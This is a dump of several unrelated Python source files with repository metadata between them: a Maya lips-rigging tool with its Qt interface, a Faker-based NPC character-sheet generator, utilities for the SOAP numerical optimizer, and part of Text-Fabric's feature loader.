"fount in the scene" % jaw_joint)
return
# in order to avoid flips lets create a reference transform
ref_cns_list = []
for cns_ref in [head_joint, jaw_joint]:
t = transform.getTransformFromPos(
cns_ref.getTranslation(space='world'))
ref = pm.createNode("transform",
n=cns_ref.name() + "_cns",
p=cns_ref,
ss=True)
ref.setMatrix(t, worldSpace=True)
ref_cns_list.append(ref)
# right corner connection
pm.parentConstraint(ref_cns_list[0],
ref_cns_list[1],
upControls[0].getParent(),
mo=True)
# left corner connection
pm.parentConstraint(ref_cns_list[0],
ref_cns_list[1],
upControls[-1].getParent(),
mo=True)
# up control connection
pm.parentConstraint(head_joint,
upControls[3].getParent(),
mo=True)
# low control connection
pm.parentConstraint(jaw_joint,
lowControls[2].getParent(),
mo=True)
###########################################
# Auto Skinning
###########################################
if do_skin:
# eyelid vertex rows
totalLoops = rigid_loops + falloff_loops
vertexLoopList = meshNavigation.getConcentricVertexLoop(vertexList,
totalLoops)
vertexRowList = meshNavigation.getVertexRowsFromLoops(vertexLoopList)
# we set the first value 100% for the first initial loop
skinPercList = [1.0]
# we expect to have a regular grid topology
for r in range(rigid_loops):
for rr in range(2):
skinPercList.append(1.0)
increment = 1.0 / float(falloff_loops)
# we invert to smooth out from 100 to 0
inv = 1.0 - increment
for r in range(falloff_loops):
for rr in range(2):
if inv < 0.0:
inv = 0.0
skinPercList.append(inv)
inv -= increment
# this loop add an extra 0.0 indices to avoid errors
for r in range(10):
for rr in range(2):
skinPercList.append(0.0)
# base skin
if head_joint:
try:
head_joint = pm.PyNode(head_joint)
except pm.MayaNodeError:
pm.displayWarning(
"Auto skin aborted can not find %s " % head_joint)
return
# Check if the object has a skinCluster
objName = pm.listRelatives(geo, parent=True)[0]
skinCluster = skin.getSkinCluster(objName)
if not skinCluster:
skinCluster = pm.skinCluster(head_joint,
geo,
tsb=True,
nw=2,
n='skinClsEyelid')
lipsJoints = upperJoints + lowerJoints
closestVtxList = upLip_closestVtxList + lowLip_closestVtxList
pm.progressWindow(title='Auto skinning process',
progress=0,
max=len(lipsJoints))
for i, jnt in enumerate(lipsJoints):
pm.progressWindow(e=True, step=1, status='\nSkinning %s' % jnt)
skinCluster.addInfluence(jnt, weight=0)
v = closestVtxList[i]
for row in vertexRowList:
if v in row:
for i, rv in enumerate(row):
# find the deformer with max value for each vertex
w = pm.skinPercent(skinCluster,
rv,
query=True,
value=True)
transJoint = pm.skinPercent(skinCluster,
rv,
query=True,
t=None)
max_value = max(w)
max_index = w.index(max_value)
perc = skinPercList[i]
t_value = [(jnt, perc),
(transJoint[max_index], 1.0 - perc)]
pm.skinPercent(skinCluster,
rv,
transformValue=t_value)
pm.progressWindow(e=True, endProgress=True)
##########################################################
# Lips Rig UI
##########################################################
class ui(MayaQWidgetDockableMixin, QtWidgets.QDialog):
valueChanged = QtCore.Signal(int)
def __init__(self, parent=None):
super(ui, self).__init__(parent)
self.filter = "Lips Rigger Configuration .lips (*.lips)"
self.create()
def create(self):
self.setWindowTitle("Lips Rigger")
self.setWindowFlags(QtCore.Qt.Window)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose, 1)
self.create_controls()
self.create_layout()
self.create_connections()
def create_controls(self):
# Geometry input controls
self.geometryInput_group = QtWidgets.QGroupBox("Geometry Input")
self.edgedge_loop_label = QtWidgets.QLabel("Edge Loop:")
self.edge_loop = QtWidgets.QLineEdit()
self.edge_loop_button = QtWidgets.QPushButton("<<")
self.up_vertex_label = QtWidgets.QLabel("Upper Vertex:")
self.up_vertex = QtWidgets.QLineEdit()
self.up_vertex_button = QtWidgets.QPushButton("<<")
self.low_vertex_label = QtWidgets.QLabel("Lower Vertex:")
self.low_vertex = QtWidgets.QLineEdit()
self.low_vertex_button = QtWidgets.QPushButton("<<")
# Name prefix
self.prefix_group = QtWidgets.QGroupBox("Name Prefix")
self.name_prefix = QtWidgets.QLineEdit()
self.name_prefix.setText("lips")
# control extension
self.control_group = QtWidgets.QGroupBox("Control Name Extension")
self.control_name = QtWidgets.QLineEdit()
self.control_name.setText("ctl")
# joints
self.joints_group = QtWidgets.QGroupBox("Joints")
self.head_joint_label = QtWidgets.QLabel("Head or Upper Lip Joint:")
self.head_joint = QtWidgets.QLineEdit()
self.head_joint_button = QtWidgets.QPushButton("<<")
self.jaw_joint_label = QtWidgets.QLabel("Jaw or Lower Lip Joint:")
self.jaw_joint = QtWidgets.QLineEdit()
self.jaw_joint_button = QtWidgets.QPushButton("<<")
# Topological Autoskin
self.topoSkin_group = QtWidgets.QGroupBox("Skin")
self.rigid_loops_label = QtWidgets.QLabel("Rigid Loops:")
self.rigid_loops = QtWidgets.QSpinBox()
self.rigid_loops.setRange(0, 30)
self.rigid_loops.setSingleStep(1)
self.rigid_loops.setValue(5)
self.falloff_loops_label = QtWidgets.QLabel("Falloff Loops:")
self.falloff_loops = QtWidgets.QSpinBox()
self.falloff_loops.setRange(0, 30)
self.falloff_loops.setSingleStep(1)
self.falloff_loops.setValue(8)
self.do_skin = QtWidgets.QCheckBox(
'Compute Topological Autoskin')
self.do_skin.setChecked(True)
# Options
self.options_group = QtWidgets.QGroupBox("Options")
self.thickness_label = QtWidgets.QLabel("Lips Thickness:")
self.thickness = QtWidgets.QDoubleSpinBox()
self.thickness.setRange(0, 10)
self.thickness.setSingleStep(.01)
self.thickness.setValue(.03)
self.parent_label = QtWidgets.QLabel("Static Rig Parent:")
self.parent_node = QtWidgets.QLineEdit()
self.parent_button = QtWidgets.QPushButton("<<")
# Build button
self.build_button = QtWidgets.QPushButton("Build Lips Rig")
self.import_button = QtWidgets.QPushButton("Import Config from json")
self.export_button = QtWidgets.QPushButton("Export Config to json")
def create_layout(self):
# Edge Loop Layout
edgedge_loop_layout = QtWidgets.QHBoxLayout()
edgedge_loop_layout.setContentsMargins(1, 1, 1, 1)
edgedge_loop_layout.addWidget(self.edgedge_loop_label)
edgedge_loop_layout.addWidget(self.edge_loop)
edgedge_loop_layout.addWidget(self.edge_loop_button)
# Outer Edge Loop Layout
up_vertex_layout = QtWidgets.QHBoxLayout()
up_vertex_layout.setContentsMargins(1, 1, 1, 1)
up_vertex_layout.addWidget(self.up_vertex_label)
up_vertex_layout.addWidget(self.up_vertex)
up_vertex_layout.addWidget(self.up_vertex_button)
# inner Edge Loop Layout
low_vertex_layout = QtWidgets.QHBoxLayout()
low_vertex_layout.setContentsMargins(1, 1, 1, 1)
low_vertex_layout.addWidget(self.low_vertex_label)
low_vertex_layout.addWidget(self.low_vertex)
low_vertex_layout.addWidget(self.low_vertex_button)
# Geometry Input Layout
geometryInput_layout = QtWidgets.QVBoxLayout()
geometryInput_layout.setContentsMargins(6, 1, 6, 2)
geometryInput_layout.addLayout(edgedge_loop_layout)
geometryInput_layout.addLayout(up_vertex_layout)
geometryInput_layout.addLayout(low_vertex_layout)
self.geometryInput_group.setLayout(geometryInput_layout)
# joints Layout
head_joint_layout = QtWidgets.QHBoxLayout()
head_joint_layout.addWidget(self.head_joint_label)
head_joint_layout.addWidget(self.head_joint)
head_joint_layout.addWidget(self.head_joint_button)
jaw_joint_layout = QtWidgets.QHBoxLayout()
jaw_joint_layout.addWidget(self.jaw_joint_label)
jaw_joint_layout.addWidget(self.jaw_joint)
jaw_joint_layout.addWidget(self.jaw_joint_button)
joints_layout = QtWidgets.QVBoxLayout()
joints_layout.setContentsMargins(6, 4, 6, 4)
joints_layout.addLayout(head_joint_layout)
joints_layout.addLayout(jaw_joint_layout)
self.joints_group.setLayout(joints_layout)
# topological autoskin Layout
skinLoops_layout = QtWidgets.QGridLayout()
skinLoops_layout.addWidget(self.rigid_loops_label, 0, 0)
skinLoops_layout.addWidget(self.falloff_loops_label, 0, 1)
skinLoops_layout.addWidget(self.rigid_loops, 1, 0)
skinLoops_layout.addWidget(self.falloff_loops, 1, 1)
topoSkin_layout = QtWidgets.QVBoxLayout()
topoSkin_layout.setContentsMargins(6, 4, 6, 4)
topoSkin_layout.addWidget(self.do_skin,
alignment=QtCore.Qt.Alignment())
topoSkin_layout.addLayout(skinLoops_layout)
topoSkin_layout.addLayout(head_joint_layout)
topoSkin_layout.addLayout(jaw_joint_layout)
self.topoSkin_group.setLayout(topoSkin_layout)
# Options Layout
lipThickness_layout = QtWidgets.QHBoxLayout()
lipThickness_layout.addWidget(self.thickness_label)
lipThickness_layout.addWidget(self.thickness)
parent_layout = QtWidgets.QHBoxLayout()
parent_layout.addWidget(self.parent_label)
parent_layout.addWidget(self.parent_node)
parent_layout.addWidget(self.parent_button)
options_layout = QtWidgets.QVBoxLayout()
options_layout.setContentsMargins(6, 1, 6, 2)
options_layout.addLayout(lipThickness_layout)
# options_layout.addLayout(offset_layout)
options_layout.addLayout(parent_layout)
self.options_group.setLayout(options_layout)
# Name prefix
name_prefix_layout = QtWidgets.QHBoxLayout()
name_prefix_layout.setContentsMargins(1, 1, 1, 1)
name_prefix_layout.addWidget(self.name_prefix)
self.prefix_group.setLayout(name_prefix_layout)
# Control Name Extension
controlExtension_layout = QtWidgets.QHBoxLayout()
controlExtension_layout.setContentsMargins(1, 1, 1, 1)
controlExtension_layout.addWidget(self.control_name)
self.control_group.setLayout(controlExtension_layout)
# Main Layout
main_layout = QtWidgets.QVBoxLayout()
main_layout.setContentsMargins(6, 6, 6, 6)
main_layout.addWidget(self.prefix_group)
main_layout.addWidget(self.control_group)
main_layout.addWidget(self.geometryInput_group)
main_layout.addWidget(self.options_group)
main_layout.addWidget(self.joints_group)
main_layout.addWidget(self.topoSkin_group)
main_layout.addWidget(self.build_button)
main_layout.addWidget(self.import_button)
main_layout.addWidget(self.export_button)
self.setLayout(main_layout)
def create_connections(self):
self.edge_loop_button.clicked.connect(
partial(self.populate_edge_loop, self.edge_loop)
)
self.up_vertex_button.clicked.connect(
partial(self.populate_element, self.up_vertex, "vertex")
)
self.low_vertex_button.clicked.connect(
partial(self.populate_element, self.low_vertex, "vertex")
)
self.parent_button.clicked.connect(
partial(self.populate_element, self.parent_node)
)
self.head_joint_button.clicked.connect(
partial(self.populate_element, self.head_joint, "joint")
)
self.jaw_joint_button.clicked.connect(
partial(self.populate_element, self.jaw_joint, "joint")
)
self.build_button.clicked.connect(self.build_rig)
self.import_button.clicked.connect(self.import_settings)
self.export_button.clicked.connect(self.export_settings)
# SLOTS ##########################################################
# TODO: create a checker to ensure that the vertex selected are part of
# the main edgelopp
def populate_element(self, lEdit, oType="transform"):
if oType == "joint":
oTypeInst = pm.nodetypes.Joint
elif oType == "vertex":
oTypeInst = pm.MeshVertex
else:
oTypeInst = pm.nodetypes.Transform
oSel = pm.selected()
if oSel:
if isinstance(oSel[0], oTypeInst):
lEdit.setText(oSel[0].name())
else:
pm.displayWarning(
"The selected element is not a valid %s" % oType)
else:
pm.displayWarning("Please select first one %s." % oType)
def populate_edge_loop(self, lineEdit):
lineEdit.setText(lib.get_edge_loop_from_selection())
def build_rig(self):
rig(**lib.get_settings_from_widget(self))
def export_settings(self):
data_string = json.dumps(
lib.get_settings_from_widget(self), indent=4, sort_keys=True
)
file_path = lib.get_file_path(self.filter, "save")
if not file_path:
return
with open(file_path, "w") as f:
f.write(data_string)
def import_settings(self):
file_path = lib.get_file_path(self.filter, "open")
if not file_path:
return
lib.import_settings_from_file(file_path, self)
# Build from json file.
def rig_from_file(path):
rig(**json.load(open(path)))
def show(*args):
gqt.showDialog(ui)
if __name__ == "__main__":
show()
| 37.934701
| 79
| 0.533394
|
4a0e9b9b2c7af5893ba59ed51d26348f82c9d88c
| 2,786
|
py
|
Python
|
main.py
|
Yar59/NPC_Generator
|
f49aa2d04e36c3a36377a9b62b0e9449b5aa9f23
|
[
"MIT"
] | null | null | null |
main.py
|
Yar59/NPC_Generator
|
f49aa2d04e36c3a36377a9b62b0e9449b5aa9f23
|
[
"MIT"
] | null | null | null |
main.py
|
Yar59/NPC_Generator
|
f49aa2d04e36c3a36377a9b62b0e9449b5aa9f23
|
[
"MIT"
] | null | null | null |
from faker import Faker
from file_operations import render_template
import random
NUMBER_OF_CARDS = 10
fake = Faker("ru_RU")
SKILLS = ["Стремительный прыжок",
"Электрический выстрел",
"Ледяной удар",
"Стремительный удар",
"Кислотный взгляд",
"Тайный побег",
"Ледяной выстрел",
"Огненный заряд"]
LETTERS_MAPPING = {
'а': 'а͠', 'б': 'б̋', 'в': 'в͒͠',
'г': 'г͒͠', 'д': 'д̋', 'е': 'е͠',
'ё': 'ё͒͠', 'ж': 'ж͒', 'з': 'з̋̋͠',
'и': 'и', 'й': 'й͒͠', 'к': 'к̋̋',
'л': 'л̋͠', 'м': 'м͒͠', 'н': 'н͒',
'о': 'о̋', 'п': 'п̋͠', 'р': 'р̋͠',
'с': 'с͒', 'т': 'т͒', 'у': 'у͒͠',
'ф': 'ф̋̋͠', 'х': 'х͒͠', 'ц': 'ц̋',
'ч': 'ч̋͠', 'ш': 'ш͒͠', 'щ': 'щ̋',
'ъ': 'ъ̋͠', 'ы': 'ы̋͠', 'ь': 'ь̋',
'э': 'э͒͠͠', 'ю': 'ю̋͠', 'я': 'я̋',
'А': 'А͠', 'Б': 'Б̋', 'В': 'В͒͠',
'Г': 'Г͒͠', 'Д': 'Д̋', 'Е': 'Е',
'Ё': 'Ё͒͠', 'Ж': 'Ж͒', 'З': 'З̋̋͠',
'И': 'И', 'Й': 'Й͒͠', 'К': 'К̋̋',
'Л': 'Л̋͠', 'М': 'М͒͠', 'Н': 'Н͒',
'О': 'О̋', 'П': 'П̋͠', 'Р': 'Р̋͠',
'С': 'С͒', 'Т': 'Т͒', 'У': 'У͒͠',
'Ф': 'Ф̋̋͠', 'Х': 'Х͒͠', 'Ц': 'Ц̋',
'Ч': 'Ч̋͠', 'Ш': 'Ш͒͠', 'Щ': 'Щ̋',
'Ъ': 'Ъ̋͠', 'Ы': 'Ы̋͠', 'Ь': 'Ь̋',
'Э': 'Э͒͠͠', 'Ю': 'Ю̋͠', 'Я': 'Я̋',
' ': ' '
}
def main(number_of_cards):
for j in range(number_of_cards):
random_first_name = fake.first_name()
random_last_name = fake.last_name()
random_job = fake.job()
random_city = fake.city()
random_skills = random.sample(SKILLS, 3)
rune_skills = []
for i in range(len(random_skills)):
rune_skills.append(random_skills[i])
for original, rune in LETTERS_MAPPING.items():
rune_skills[i] = rune_skills[i].replace(original, rune)
context = {
"first_name": random_first_name,
"last_name": random_last_name,
"town": random_city,
"job": random_job,
"strength": random.randint(3, 18),
"agility": random.randint(3, 18),
"endurance": random.randint(3, 18),
"intelligence": random.randint(3, 18),
"luck": random.randint(3, 18),
"skill_1": rune_skills[0],
"skill_2": rune_skills[1],
"skill_3": rune_skills[2]
}
input_pass = "src/charsheet.svg"
output_pass = """output/svg/{j}.{f_name}{l_name}.svg\
""".format(j=j,
f_name=random_first_name,
l_name=random_last_name)
render_template(input_pass, output_pass, context)
if __name__ == '__main__':
main(NUMBER_OF_CARDS)
| 33.97561
| 71
| 0.416009
|
4a0e9ca537e55a269872ae3c75cdac62b45c71ca
| 5,377
|
py
|
Python
|
soap/shell/utils.py
|
gitter-badger/soap
|
4f5eb7848e4dc516a6ff972db5c8c46ec9037c47
|
[
"MIT"
] | 22
|
2016-02-08T16:57:30.000Z
|
2021-03-12T20:32:06.000Z
|
soap/shell/utils.py
|
gitter-badger/soap
|
4f5eb7848e4dc516a6ff972db5c8c46ec9037c47
|
[
"MIT"
] | 1
|
2018-07-11T21:21:27.000Z
|
2018-07-17T19:53:19.000Z
|
soap/shell/utils.py
|
gitter-badger/soap
|
4f5eb7848e4dc516a6ff972db5c8c46ec9037c47
|
[
"MIT"
] | 6
|
2016-02-01T13:30:56.000Z
|
2018-11-28T04:35:27.000Z
|
import csv
import os
import random
import time
from soap import logger
from soap.analysis import frontier as analysis_frontier, Plot
from soap.context import context
from soap.expression import is_expression
from soap.parser import parse as _parse
from soap.program.generator import generate_function
from soap.semantics import (
arith_eval, BoxState, ErrorSemantics, flow_to_meta_state, IntegerInterval
)
from soap.transformer import (
closure, expand, frontier, greedy, parsings, reduce, thick,
partition_optimize
)
def parse(program):
if isinstance(program, str):
if program.endswith('.soap'):
with open(program) as file:
program = file.read()
program = _parse(program)
state = program.inputs
out_vars = program.outputs
return program, state, out_vars
def _generate_samples(iv, population_size):
random.seed(0)
def sample(error):
if isinstance(error, IntegerInterval):
v = random.randrange(error.min, error.max + 1)
return IntegerInterval([v, v])
v = random.uniform(error.v.min, error.v.max)
e = random.uniform(error.e.min, error.e.max)
return ErrorSemantics(v, e)
samples = [
BoxState({var: sample(error) for var, error in iv.items()})
for i in range(population_size)]
return samples
def _run_simulation(program, samples, outputs):
max_error = 0
n = len(samples)
try:
for i, iv in enumerate(samples):
logger.persistent(
'Sim', '{}/{}'.format(i + 1, n), l=logger.levels.debug)
result_state = arith_eval(program, iv)
error = max(
max(abs(error.e.min), abs(error.e.max))
for var, error in result_state.items() if var in outputs)
max_error = max(error, max_error)
logger.unpersistent('Sim')
except KeyboardInterrupt:
pass
return max_error
def simulate_error(program, population_size):
program, inputs, outputs = parse(program)
samples = _generate_samples(BoxState(inputs), population_size)
return _run_simulation(flow_to_meta_state(program), samples, outputs)
_algorithm_map = {
'closure': lambda expr_set, _1, _2: closure(expr_set),
'expand': lambda expr_set, _1, _2: expand(expr_set),
'parsings': lambda expr_set, _1, _2: parsings(expr_set),
'reduce': lambda expr_set, _1, _2: reduce(expr_set),
'greedy': greedy,
'frontier': frontier,
'thick': thick,
'partition': partition_optimize,
}
def optimize(source, file_name=None):
program, inputs, outputs = parse(source)
if not is_expression(program):
program = flow_to_meta_state(program).filter(outputs)
func = _algorithm_map[context.algorithm]
state = BoxState(inputs)
original = analysis_frontier([program], state, outputs).pop()
start_time = time.time()
results = func(program, state, outputs)
elapsed_time = time.time() - start_time
# results = analysis_frontier(expr_set, state, out_vars)
emir = {
'original': original,
'inputs': inputs,
'outputs': outputs,
'results': results,
'time': elapsed_time,
'context': context,
'source': source,
'file': file_name,
}
return emir
def plot(emir, file_name, reanalyze=False):
plot = Plot()
results = emir['results']
original = emir['original']
func_name = emir['context'].algorithm
plot.add_original(original)
plot.add(results, legend='{} ({:.2f}s)'.format(func_name, emir['time']))
plot.save('{}.pdf'.format(emir['file']))
plot.show()
def emir2csv(emir, file):
name = os.path.split(emir['file'])[-1]
name = name.split(os.path.extsep)[0]
csvwriter = csv.writer(file, lineterminator='\n')
orig = emir['original']
csvwriter.writerow(orig._fields)
csvwriter.writerow(orig[:-1] + (emir['source'], ))
for i, result in enumerate(emir['results']):
logger.persistent(
'Generate', '{}/{}'.format(i + 1, len(emir['results'])))
stats = result.stats()
expr = result.expression
code = generate_function(name, expr, emir['inputs'], emir['outputs'])
csvwriter.writerow(stats + (code, ))
logger.unpersistent('Generate')
def report(emir, file_name):
def sub_report(result):
samples = _generate_samples(emir['inputs'], 100)
sim_error = _run_simulation(
result.expression, samples, emir['outputs'])
return {
'Accuracy': {
'Error Bound': float(result.error),
'Simulation': float(sim_error),
},
'Resources': {
'Estimated': {
'LUTs': result.lut,
'Registers': result.ff,
'DSP Elements': result.dsp,
},
},
}
original = emir['original']
results = sorted(emir['results'])
report = {
'Name': file_name,
'Time': emir['time'],
'Total': len(emir['results']),
'Statistics': {
'Original': sub_report(original),
'Fewest Resources': sub_report(results[0]),
'Most Accurate': sub_report(results[-1]),
'Best Latency': sub_report(...),
},
'Context': emir['context'],
}
return report
| 31.080925
| 77
| 0.612237
|
4a0e9e8734fac4f422655e522f6ca590f0cefb0c
| 151
|
py
|
Python
|
StickyDJ-Bot/src/clients/config.py
|
JCab09/StickyDJ-Bot
|
feaf2229a6729be6ad022f9105da19192e3a91d3
|
[
"WTFPL"
] | null | null | null |
StickyDJ-Bot/src/clients/config.py
|
JCab09/StickyDJ-Bot
|
feaf2229a6729be6ad022f9105da19192e3a91d3
|
[
"WTFPL"
] | null | null | null |
StickyDJ-Bot/src/clients/config.py
|
JCab09/StickyDJ-Bot
|
feaf2229a6729be6ad022f9105da19192e3a91d3
|
[
"WTFPL"
] | null | null | null |
#!/usr/bin/env python3
"""Base-Client configloader
So far Obsolete due to configmaker-module
in ../src/util/configmaker.py
Author: Jason Cabezuela
"""
| 21.571429
| 41
| 0.761589
|
4a0e9f22058f068a9bd0c1f19c9af26c9b689452
| 345
|
py
|
Python
|
cryptopals/set1/1.py
|
diofeher/ctf-writeups
|
b82eaae064fe5339c69892dd084e0f1915ca8bb5
|
[
"MIT"
] | 8
|
2018-12-30T06:49:29.000Z
|
2021-06-30T22:37:54.000Z
|
cryptopals/set1/1.py
|
diofeher/ctf-writeups
|
b82eaae064fe5339c69892dd084e0f1915ca8bb5
|
[
"MIT"
] | null | null | null |
cryptopals/set1/1.py
|
diofeher/ctf-writeups
|
b82eaae064fe5339c69892dd084e0f1915ca8bb5
|
[
"MIT"
] | 2
|
2020-03-10T11:04:54.000Z
|
2020-10-13T12:34:16.000Z
|
import base64
def hex_to_b64(text):
hx = text.decode('hex')
return base64.b64encode(hx)
st = '49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6d'
# I'm killing your brain like a poisonous mushroom
assert hex_to_b64(st) == 'SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3VzIG11c2hyb29t'
| 34.5
| 103
| 0.831884
|
4a0e9f46414a8d463bcdffa28f734a17d3413cbe
| 207
|
py
|
Python
|
regtests/bench/recursive_fib.py
|
secureosv/pythia
|
459f9e2bc0bb2da57e9fa8326697d9ef3386883a
|
[
"BSD-3-Clause"
] | 17
|
2015-12-13T23:11:31.000Z
|
2020-07-19T00:40:18.000Z
|
regtests/bench/recursive_fib.py
|
secureosv/pythia
|
459f9e2bc0bb2da57e9fa8326697d9ef3386883a
|
[
"BSD-3-Clause"
] | 8
|
2016-02-22T19:42:56.000Z
|
2016-07-13T10:58:04.000Z
|
regtests/bench/recursive_fib.py
|
secureosv/pythia
|
459f9e2bc0bb2da57e9fa8326697d9ef3386883a
|
[
"BSD-3-Clause"
] | 3
|
2016-04-11T20:34:31.000Z
|
2021-03-12T10:33:02.000Z
|
'''
Fibonacci Sequence
'''
from time import clock
def F(n):
if n == 0: return 0
elif n == 1: return 1
else: return F(n-1)+F(n-2)
def main():
start = clock()
a = F( 32 )
print(clock()-start)
main()
| 11.5
| 27
| 0.584541
|
4a0e9f94844fff257b98f6c35f270e0df0fc5e8b
| 19,188
|
py
|
Python
|
tf/fabric.py
|
gitter-badger/text-fabric
|
ac614e490d0779a6ad89dbf30b697cd6e736bd57
|
[
"MIT"
] | null | null | null |
tf/fabric.py
|
gitter-badger/text-fabric
|
ac614e490d0779a6ad89dbf30b697cd6e736bd57
|
[
"MIT"
] | null | null | null |
tf/fabric.py
|
gitter-badger/text-fabric
|
ac614e490d0779a6ad89dbf30b697cd6e736bd57
|
[
"MIT"
] | 1
|
2020-01-22T13:13:30.000Z
|
2020-01-22T13:13:30.000Z
|
import os
import collections
from .parameters import VERSION, NAME, APIREF, LOCATIONS
from .core.data import Data, WARP, WARP2_DEFAULT, MEM_MSG
from .core.helpers import (
itemize, setDir, expandDir, collectFormats, cleanName, check32, console, makeExamples
)
from .core.timestamp import Timestamp
from .core.prepare import (levels, order, rank, levUp, levDown, boundary, sections, structure)
from .core.api import (
Api,
NodeFeature,
EdgeFeature,
OtypeFeature,
OslotsFeature,
Computed,
addSortKey,
addOtype,
addLocality,
addRank,
addText,
addSearch,
)
from .convert.mql import MQL, tfFromMql
PRECOMPUTE = (
(False, '__levels__', levels, WARP),
(False, '__order__', order, WARP[0:2] + ('__levels__', )),
(False, '__rank__', rank, (WARP[0], '__order__')),
(False, '__levUp__', levUp, WARP[0:2] + ('__rank__', )),
(False, '__levDown__', levDown, (WARP[0], '__levUp__', '__rank__')),
(False, '__boundary__', boundary, WARP[0:2] + ('__rank__', )),
(True, '__sections__', sections, WARP + ('__levUp__', '__levels__')),
(True, '__structure__', structure, WARP + ('__rank__', '__levUp__',)),
)
KIND = dict(
__sections__='section',
__structure__='structure',
)
class Fabric(object):
def __init__(self, locations=None, modules=None, silent=False):
self.silent = silent
self.tm = Timestamp()
self.tm.setSilent(silent)
self.banner = f'This is {NAME} {VERSION}'
self.version = VERSION
(on32, warn, msg) = check32()
if on32:
self.tm.info(warn, tm=False)
if msg:
self.tm.info(msg, tm=False)
self.tm.info(
f'''{self.banner}
Api reference : {APIREF}
''', tm=False
)
self.good = True
if modules is None:
modules = ['']
if type(modules) is str:
modules = [x.strip() for x in itemize(modules, '\n')]
self.modules = modules
if locations is None:
locations = LOCATIONS
if type(locations) is str:
locations = [x.strip() for x in itemize(locations, '\n')]
setDir(self)
self.locations = []
for loc in locations:
self.locations.append(expandDir(self, loc))
self.locationRep = '\n\t'.join(
'\n\t'.join(f'{l}/{f}' for f in self.modules) for l in self.locations
)
self.featuresRequested = []
self._makeIndex()
def load(self, features, add=False, silent=None):
if silent is not None:
wasSilent = self.tm.isSilent()
self.tm.setSilent(silent)
self.tm.indent(level=0, reset=True)
self.tm.info('loading features ...')
self.sectionsOK = True
self.structureOK = True
self.good = True
if self.good:
featuresRequested = itemize(features) if type(features) is str else sorted(features)
if add:
self.featuresRequested += featuresRequested
else:
self.featuresRequested = featuresRequested
for fName in list(WARP):
self._loadFeature(fName, optional=fName == WARP[2])
if self.good:
self.textFeatures = set()
if WARP[2] in self.features:
otextMeta = self.features[WARP[2]].metaData
for otextMod in self.features:
if otextMod.startswith(WARP[2] + '@'):
self._loadFeature(otextMod)
otextMeta.update(self.features[otextMod].metaData)
self.sectionFeats = itemize(otextMeta.get('sectionFeatures', ''), ',')
self.sectionTypes = itemize(otextMeta.get('sectionTypes', ''), ',')
self.structureFeats = itemize(otextMeta.get('structureFeatures', ''), ',')
self.structureTypes = itemize(otextMeta.get('structureTypes', ''), ',')
(self.cformats, self.formatFeats) = collectFormats(otextMeta)
if not (0 < len(self.sectionTypes) <= 3) or not (0 < len(self.sectionFeats) <= 3):
if not add:
self.tm.warning(
f'No section config in {WARP[2]}, the section part of the T-API cannot be used'
)
self.sectionsOK = False
else:
self.textFeatures |= set(self.sectionFeats)
self.sectionFeatsWithLanguage = {
f
for f in self.features
if f == self.sectionFeats[0] or f.startswith(f'{self.sectionFeats[0]}@')
}
self.textFeatures |= set(self.sectionFeatsWithLanguage)
if not self.structureTypes or not self.structureFeats:
if not add:
self.tm.warning(
f'No structure info in {WARP[2]}, the structure part of the T-API cannot be used'
)
self.structureOK = False
else:
self.textFeatures |= set(self.structureFeats)
self.textFeatures |= set(self.formatFeats)
for fName in self.textFeatures:
self._loadFeature(fName)
else:
self.sectionsOK = False
self.structureOK = False
if self.good:
self._precompute()
if self.good:
for fName in self.featuresRequested:
self._loadFeature(fName)
if not self.good:
self.tm.indent(level=0)
self.tm.error('Not all features could be loaded/computed')
self.tm.cache()
result = False
elif add:
try:
self._updateApi()
except MemoryError:
console(MEM_MSG)
result = False
else:
try:
result = self._makeApi()
except MemoryError:
console(MEM_MSG)
result = False
if silent is not None:
self.tm.setSilent(wasSilent)
if not add:
return result
def explore(self, silent=None, show=True):
if silent is not None:
wasSilent = self.tm.isSilent()
self.tm.setSilent(silent)
nodes = set()
edges = set()
configs = set()
computeds = set()
for (fName, fObj) in self.features.items():
fObj.load(metaOnly=True)
dest = None
if fObj.method:
dest = computeds
elif fObj.isConfig:
dest = configs
elif fObj.isEdge:
dest = edges
else:
dest = nodes
dest.add(fName)
self.tm.info(
'Feature overview: {} for nodes; {} for edges; {} configs; {} computed'.format(
len(nodes),
len(edges),
len(configs),
len(computeds),
)
)
self.featureSets = dict(nodes=nodes, edges=edges, configs=configs, computeds=computeds)
if silent is not None:
self.tm.setSilent(wasSilent)
if show:
return dict((kind, tuple(sorted(kindSet)))
for (kind, kindSet) in sorted(self.featureSets.items(), key=lambda x: x[0]))
def loadAll(self, silent=None):
api = self.load('', silent=silent)
allFeatures = self.explore(silent=silent or True, show=True)
loadableFeatures = allFeatures['nodes'] + allFeatures['edges']
self.load(loadableFeatures, add=True, silent=silent)
return api
def clearCache(self):
for (fName, fObj) in self.features.items():
fObj.cleanDataBin()
def save(
self,
nodeFeatures={},
edgeFeatures={},
metaData={},
location=None,
module=None,
silent=None,
):
good = True
if silent is not None:
wasSilent = self.tm.isSilent()
self.tm.setSilent(silent)
self.tm.indent(level=0, reset=True)
self._getWriteLoc(location=location, module=module)
configFeatures = dict(
f for f in metaData.items()
if f[0] != '' and f[0] not in nodeFeatures and f[0] not in edgeFeatures
)
self.tm.info(
'Exporting {} node and {} edge and {} config features to {}:'.format(
len(nodeFeatures),
len(edgeFeatures),
len(configFeatures),
self.writeDir,
)
)
todo = []
for (fName, data) in sorted(nodeFeatures.items()):
todo.append((fName, data, False, False))
for (fName, data) in sorted(edgeFeatures.items()):
todo.append((fName, data, True, False))
for (fName, data) in sorted(configFeatures.items()):
todo.append((fName, data, None, True))
total = collections.Counter()
failed = collections.Counter()
maxSlot = None
maxNode = None
slotType = None
if WARP[0] in nodeFeatures:
self.tm.info(f'VALIDATING {WARP[1]} feature')
otypeData = nodeFeatures[WARP[0]]
if type(otypeData) is tuple:
(otypeData, slotType, maxSlot, maxNode) = otypeData
elif 1 in otypeData:
slotType = otypeData[1]
maxSlot = max(n for n in otypeData if otypeData[n] == slotType)
maxNode = max(otypeData)
if WARP[1] in edgeFeatures:
self.tm.info(f'VALIDATING {WARP[1]} feature')
oslotsData = edgeFeatures[WARP[1]]
if type(oslotsData) is tuple:
(oslotsData, maxSlot, maxNode) = oslotsData
if maxSlot is None or maxNode is None:
self.tm.error(f'ERROR: cannot check validity of {WARP[1]} feature')
good = False
else:
self.tm.info(f'maxSlot={maxSlot:>11}')
self.tm.info(f'maxNode={maxNode:>11}')
